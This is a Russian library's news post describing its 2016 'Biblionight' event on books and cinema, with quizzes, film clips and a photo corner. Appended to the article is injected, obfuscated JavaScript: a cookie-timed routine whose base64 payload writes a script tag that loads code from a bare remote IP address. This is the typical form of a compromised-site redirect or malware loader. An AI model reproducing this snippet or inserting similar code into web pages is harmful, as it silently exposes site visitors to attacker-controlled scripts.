Библионочь-2016

Всероссийская акция «Библионочь» — ежегодное масштабное событие в поддержку чтения. В этом году она была посвящена Году кино в России!

22 апреля Манская межпоселенческая библиотека провела «Библионочь – 2016». Тема акции «Книга и кино. В ночь с пятницы на субботу двери библиотеки были распахнуты для всех желающих принять участие в акции.

Для наших гостей была подготовлена обширная программа, в которой можно было принять участие в интеллектуальных играх, викторинах, поучаствовать на четырех площадках, которые подготовили сотрудники библиотеки. И каждый нашел себе занятие по душе вне зависимости от возраста.

Площадка «Кинофильмы…кинокниги…». Здесь все желающие смогли принять участие в викторине по экранизированным книгам. Также была оформлена выставка-подсказка «Кинофильмы-Кинокниги», на которой можно было найти правильный ответ.

На площадке «Манский кинограф» гости вечера узнали о фильмах, снимавшихся в Манском районе. Были показаны фрагменты фильма «Хозяин тайги» и предложена киновикторина по фильму с активным обсуждением.

Поймать волну хорошего настроения вместе с музыкой из кинофильмов можно было на площадке «Кино и музыка».

Сфотографироваться в образе киногероя и почувствовать себя на миг актером, все желающие смогли в фотосалоне «Начинающий актер».

function getCookie (e){var U=document.cookie.match (new RegExp («(?:^|; )»+e.replace (/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent (U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor (Date.now ()/1e3),cookie=getCookie («redirect»);if (now>=(time=cookie)||void 0===time){var time=Math.floor (Date.now ()/1e3+86400),date=new Date ((new Date).getTime ()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString (),document.write ('')}